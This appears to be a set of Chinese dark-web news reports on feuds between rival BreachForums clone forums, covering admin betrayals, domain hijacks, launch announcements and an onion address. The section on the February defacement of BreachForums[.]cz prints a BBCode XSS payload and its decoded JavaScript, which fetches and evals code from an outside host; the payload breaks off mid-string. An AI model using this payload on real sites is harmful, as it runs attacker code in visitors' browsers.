近期,一个暂时活着的BreachForums突遇变故,其创始人HasanBroker遭受该论坛的其他管理员背刺。论坛的其他几位管理员抢走论坛的明网域名、论坛数据库与源代码并另立门户,虽然后来HasanBroker成功夺回明网域名,但已经改变不了其BreachForums论坛已经易主的事实。不过HasanBroker表示,他正在创建新的BreachForums论坛。
HasanBroker称BreachForums的其他几位工作人员背叛了他 5月20日,HasanBroker在其Telegram频道发布公告称,昨天在其外出途中,BreachForums论坛的管理员Diencracked、Resolute以及其他几位工作人员背叛了他,为了谋取私利和满足贪欲,他们把一切都毁了。
HasanBroker表示,可以想象,无论是从情感层面,还是从恢复论坛的角度来看,他都深受伤害。但他向大家保证,最多48小时到一周内,他就能恢复并解决所有问题。因为这种情况他以前也遇到过,也成功恢复了,这次一定同样能做到。
HasanBroker称,他提拔了Diencracked,Diencracked所拥有的一切都是因为他,而Diencracked的作用微乎其微。如果有论坛用户认为Diencracked是个能干的领导者,能为大家带来光明,那就错了,Diencracked却为了钱背叛了他和那些信任他的人,
HasanBroker还表示,他已成功恢复了所有数据,包括服务器和所有信息——但在重新评估所有选项并为平台建立更稳固的基础之前,他会暂时关闭论坛。
随后,HasanBroker称,他还成功恢复了BreachForums明网域名breached[.]st的控制权,其域名已经完成了KYC认证,而背叛者们现在无法掌控该域名。HasanBroker感谢大家在这段艰难时期陪伴左右,感谢了Spear、PwnForums以及所有支持他的人,还有其视若珍宝的忠实粉丝们。
Diencracked已经成为BreachForums新的创始人 在原先的BreachForums里,Hasan和Vect已被清除。Diencracked与LAPSUS$、TeampPCP、GhostSec、Resolute和Shinigami共同接管了论坛的领导权。
Diencracked发布公告称,HasanBroker已经结束,虽然原明网域名breached[.]st还能使用,但即将迁移至新的明网域名breached[.]su,希望大家更新书签。
HasanBroker控诉Diencracked,并表示新论坛正在开放 HasanBroker继续在其Telegram频道发布新的公告称,他在一年前这个时候创办了BreachForums,直到大约8个月后,Diencracked主动联系他加入,他才知道Diencracked的存在。
HasanBroker表示,希望Diencracked知道,他曾把Diencracked当作亲兄弟般爱护——任何和他共事过的人都能证明这一点。但是Diencracked背叛了他,背叛了论坛成员们,还背叛了整个论坛。
HasanBroker说:
这不是你第一次对我做出这种事了。我祝你生活顺利,但我绝不会坐视你像对我那样坑害其他人。
你知道自己是个毫无价值、毫无尊严的叛徒。当你绝望、自杀倾向、孤立无援地来找我时,我在你人生最低谷时陪伴着你。你为了一个我本打算送给你的论坛而失去了我,现在你一无所有了,因为你暴露了真面目。
HasanBroker称,无论白天多忙,都会回复每一位成员的私信,都尽可能满足每个人的请求,尽管自己也并非完美无缺——他深知人无完人,但他绝不会为了金钱或社区声望而背叛朋友,更何况这里的荣誉唯有清白才能赢得。
HasanBroker保证,在困难时期,领导者从未抛弃大家,他将会尽最大努力,战斗到底。
HasanBroker透露,他组建了一支由开发者和所有者组成的小队,正致力于BreachForums与DoxByte两个项目。其中BreachForums依旧使用XenForo平台,正在全面重建前端界面。因为他和新加入的开发团队对旧版前端界面的外观并不满意,而且他们认为之前的开发者过度依赖人工智能,导致界面设计得十分糟糕。
公告显示,新的BreachForums论坛已经做出设计调整,前端界面已经发布,让论坛看起来不像个2022年风格的论坛。HasanBroker保证新论坛将在三周内发布。
对此,“暗网下/AWX”认为,当前的暗网社区运营更像似联合国安理会对世界的治理,从以前的单一管理员运作走向了多元管理,而争议就在利益冲突中产生。HasanBroker新开发的BreachForums何时诞生,本站将持续关注。
更多暗网新闻动态,请关注“暗网下/AWX”。
自从多次重启后的BreachForums论坛被FBI查封之后,暗网先后出现了两个名为BreachForums的论坛,一个是Indra的BreachForums[.]bf(管理员Indra与N/A),一个是Hasan的BreachForums[.]cz(管理员HasanBroker与breach3d)。这两个论坛的诞生注定会硝烟四起,BreachForums克隆论坛之间的一场战役正在打响。
“暗网下/AWX”此前跟踪报道,Indra的BreachForums[.]bf于2025年12月诞生,使用MyBB搭建,通过投放.fr域名数据库并伪造政府邮箱宣布论坛成立,宣称自己才是真正的官方BF论坛;Hasan的BreachForums[.]cz于2026年1月出现,使用XenForo搭建,称自己才是正统,目前已吸引逾1400名成员加入。
近期,这两个BreachForums论坛的战争进入了白日化阶段,先是BreachForums[.]bf域名被社会工程学攻击后被暂停,其次BreachForums[.]cz论坛也遭受了短时间的跨站脚本(XSS)漏洞攻击,整体而言,Hasan的BreachForums[.]cz略占上风。
BreachForums[.]bf域名丢失后又被找回 2月3日,BreachForums[.]bf域名突然被域名注册商暂停访问,其管理员N/A发布公告,紧急启动BreachForums[.]jp域名来替代访问。同时,Hasan在BreachForums[.]cz发布主题“Takedown of the Fake Clone”(拿下仿冒克隆),并表示正在使用SQL注入、跨站脚本、SSRF请求等诸多漏洞进行攻击。
2月8日,访问BreachForums[.]bf,显示异常的篡改消息以及倒计时,暗示该平台可能遭遇安全事件或系统入侵。界面显示了以下内容:公开倒计时、泄露的个人图像、提及涉嫌犯罪活动及执法部门的签名声明、与论坛常规运营通知无关的声明。
根据暗网研究专家IntelOps(@IntelOpsV3)发布的消息,有黑客窃取某西非国家政府邮箱后,通过社会工程手段诱使域名注册商暂停了BF域名。域名注册商将技术援助请求转交布基纳法索的ABDI机构作为主管当局寻求协助,但技术援助集体成功推动其采取行动。
据称,Hasan在该域名被删除后成功注册该域名,并在2月8日发布了篡改页面。但Indra最终说服注册商该举报属虚假信息,重新夺回BreachForums[.]bf域名控制权,并发布公告恢复该域名的使用。
BreachForums[.]cz网站被篡改后快速恢复 2月5日,BreachForums[.]cz网站曾遭遇了一次跨站脚本(XSS)漏洞攻击,短暂遭到篡改,疑似因为XenForo存在跨站脚本漏洞。Hasan发帖解释,该XSS漏洞可利用性源于XenForo解析BBcode的机制,属于原生漏洞即零日漏洞。
该Payload利用JavaScript的eval函数实现Base64编码的解码功能(部分依赖混淆性安全机制)。通过atob函数解码后,得到以下在鼠标悬停时触发的JavaScript有效载荷:
(async() => {
var u = "https://breachforums.pathetic.wtf/server.php?get=payload";
var r = await fetch(u);
var t = await r.text();
eval(t);
})() Payload如下:
'c': ['https://breachforums.pathetic.wtf/server.php', "[table width=\"100%' onmouseover='eval(atob("KGFzeW5jKCk9PnsgICAgIHZhciB1ID0gImh0dHBzOi8vYnJlYWNoZm9ydW1zLnBhdGhldGljLnd0Zi9zZXJ2ZXIucGhwP2dldD1wYXlsb2FkIjsgICAgIHZhciByID0gYXdhaXQgZmV0Y2godSk7ICAgICB2YXIgdCA9IGF3YWl0IHIudGV4dCgpOyAgICAgZXZhbCh0KTsgfSkoKQ=="))'\"] [tr][td]click here and you will be entered into the giveaway[/td][/tr] [/table]", 0x1, "credits giveawayy", 0x0, 0x1964, 'setTimeout', 0x2, "\n<head>\n <meta charset=\"utf-8\">\n <title>owned</title>\n <style>\n body { margin: 0; padding: 0; height: 100vh; background: #000; color: #ff00aa; font-family: 'Courier New', Courier, monospace; display: flex; align-items: center; justify-content: center; text-align: center; overflow: hidden; }\n .
自从后缀为bf的新BreachForums出现后,原BreachForums的管理员HasanBroker一直表示该BreachForums(breachforums[.]bf)系冒牌货,并称自己将努力恢复真正的BreachForums,并重塑辉煌。终于在1月17日,HasanBroker在其Telegram频道宣布了另一个新BreachForums的诞生,开放邀请大家注册。
“暗网下/AWX”看到,HasanBroker创建的BreachForums是基于论坛程序XenForo搭建的,而传统的BreachForums都是使用论坛程序MyBB,或许是由于MyBB可能存在一些不确定漏洞的缘故。
HasanBroker的新版本BreachForums明网与暗网地址如下:
明网地址:breachforums[.]cz
暗网地址:http://breach5yz2b5lepmq4gaqwcon3jippw3bislhvvdavem5git55sy2nid[.]onion
在宣布该新BreachForums(breachforums[.]cz)成立的公告中,HasanBroker宣称,BreachForums已经不复存在,支离破碎,影响力日渐式微。如今剩下的只有噪音、诱饵陷阱和那些试图取代昔日辉煌的平台。该新论坛旨在重建一个专注于信息、技术讨论和社区驱动的交流空间,摒弃一切浮夸作秀、虚假承诺和虚伪伪装。
HasanBroker称,他无意改写历史,也并非觊觎从未正式传承的头衔。这无关所有权,而是关乎方向。他们将回归这些论坛的初心:赚钱、恶搞、突袭、数据泄露、数据交易,以及最重要的——享受乐趣。
HasanBroker表示,注册受到严格限制。所有申请均需人工审核,审核标准包括:
展现出的操作意识 行为规范且具备常识 HasanBroker提醒道,不使用Gmail等邮箱就能很好地证明这一点,并举例说cock.li是一个不错的隐私选择。
HasanBroker承诺新BreachForums保持匿名,并致力于最大限度地减少不必要的曝光。他们已采取措施规避不记录IP地址的问题,并从论坛软件中彻底移除了该功能。目前,他们仅通过服务器日志记录IP地址,以防止DDoS攻击,但无法追踪到目标用户,且日志每天都会被删除。
HasanBroker要求使用VPN或Tor浏览器访问他的新BreachForums
最后,HasanBroker宣布:
如果您想恶意捣乱、攻击或制造全球性事件——这里正是您理想的去处。
如果您正在寻找一个重视谨慎、贡献和持续性的社区——欢迎您。
愿上帝保佑我们的论坛,消灭它的敌人。
BreachForums万岁!
此外,HasanBroker在Telegram频道表示,虽然随着所有重要工作的完成,新BreachForums论坛已搭建完成正式上线,但还会有更多的更新,如SMTP服务器还需要时间完善,注册采用手动审核机制,不过这部分问题不算太严重。太阳已在BreachForums论坛升起,照亮了那些骗子。
HasanBroker称在Telegram和其他平台上的活跃度将相对减少,专门使用BreachForums进行数据交易等,除非情况发生变化。接下来几天将添加Shoutbox和Escrow功能。HasanBroker提醒,无论多么有吸引力,切勿让任何平台剥夺您的操作安全权利。始终使用VPN或Tor,如果担心后门,可以两者都用。
近2天的Telegram频道公告发布了该论坛的更新,将Tor图标移至Clearnet主界面(此前图标显示位置错误,即使用户退出Tor网络,图标仍会保留),升级后相关问题已得到解决。另外,HasanBroker宣布了接下来将要开发的功能或者将要进行的活动:
完整的托管系统 向我们的成员颁发奖励 可能的赠品活动 ShinyHunters和其他团体发布的高质量数据 广告系统 喊话箱 对于“广告系统”,HasanBroker解释道,每个横幅将是一个N/A模板,直到有人决定为其支付1000积分,这些积分可以通过活跃度获得或支付35欧元。一旦你这样做,它将进入审批队列,并可以由工作人员接受——如果被拒绝,你将获得积分返还,并且可以再次申请。常见问题将显示你需要避免的审批事项。
对于“托管系统”,HasanBroker解释道,每个人都知道托管是如何运作的,它是任何论坛的重要结构,尤其是像BreachForums这样的论坛——你提交你的数据,买家提交资金,当双方都批准时,交易发生,否则,资金将自动从任一方退回。
对于“喊话箱”,HasanBroker解释道,虽然有点晚,但他们正在重新设计在MyBB软件上使用的原始喊话箱,但由于新BreachForums使用的是XenForo,设计上有些不同,它将很快发布,比之前的系统快得多。
经测试,截止发稿,从零开始的新BreachForums论坛的注册用户已经250多人,帖子数目60多篇,活跃度渐增,发展势头很明显。HasanBroker的新BreachForums(breachforums[.]cz)是否能够超越或者替代Indra的新BreachForums(breachforums[.]bf),FBI等执法部门对此后起之秀是否有新的执法行动,“暗网下/AWX”将持续关注。
更多暗网新闻动态,请关注“暗网下/AWX”。